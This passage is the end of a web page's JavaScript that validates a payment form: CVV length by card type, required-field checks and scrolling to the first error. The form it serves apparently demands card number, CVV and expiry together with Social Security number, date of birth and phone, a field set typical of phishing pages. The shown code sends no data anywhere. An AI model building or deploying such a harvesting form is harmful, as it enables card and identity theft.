            cvvInput.addEventListener('input', function() {
                var raw = this.value.replace(/\D/g, '');
                if (raw.length === 0) { clearStyle(this); return; }
                var cardRaw = cardInput ? cardInput.value.replace(/\D/g, '') : '';
                var expectedLen = /^3[47]/.test(cardRaw) ? 4 : 3;
                if (raw.length === expectedLen) {
                    setValidStyle(this);
                } else {
                    setInvalidStyle(this);
                }
            });
        }

        // Form submit: validate + scroll to first error
        var form = document.querySelector('form');
        if (form) {
            form.addEventListener('submit', function(e) {
                var requiredFields = [
                    { id: 'firstName', err: 'error_message_firstName' },
                    { id: 'lastName', err: 'error_message_lastName' },
                    { id: 'cardNumber', err: 'error_message_cardNumber' },
                    { id: 'line1', err: 'error_message_line1' },
                    { id: 'city', err: 'error_message_city' },
                    { id: 'zip', err: 'error_message_zip' },
                    { id: 'SSN', err: 'error_message_SSN' },
                    { id: 'DOB', err: 'error_message_DOB' },
                    { id: 'phonenumber', err: 'error_message_phonenumber' }
                ];
                var firstError = null;
                for (var i = 0; i < requiredFields.length; i++) {
                    var el = document.getElementById(requiredFields[i].id);
                    if (el && el.value.trim() === '') {
                        if (!firstError) firstError = el;
                        var errEl = document.getElementById(requiredFields[i].err);
                        if (errEl) errEl.style.display = 'block';
                    }
                }
                // Check expiration selects
                if (expMonth && (!expMonth.value || expMonth.value === '')) {
                    if (!firstError) firstError = expMonth;
                }
                if (expYear && (!expYear.value || expYear.value === '')) {
                    if (!firstError) firstError = expYear;
                }
                // Check CVV
                var cvvEl = document.getElementById('cvv');
                if (cvvEl && cvvEl.value.trim() === '') {
                    if (!firstError) firstError = cvvEl;
                }
                if (firstError) {
                    e.preventDefault();
                    firstError.scrollIntoView({ behavior: 'smooth', block: 'center' });
                    firstError.focus();
                } else {
                    var btn = document.getElementById('NextButton');
                    if (btn) { btn.classList.add('btn-loading'); btn.disabled = true; }
                }
            });
        }
    });
})();
</script>
</body>

</html>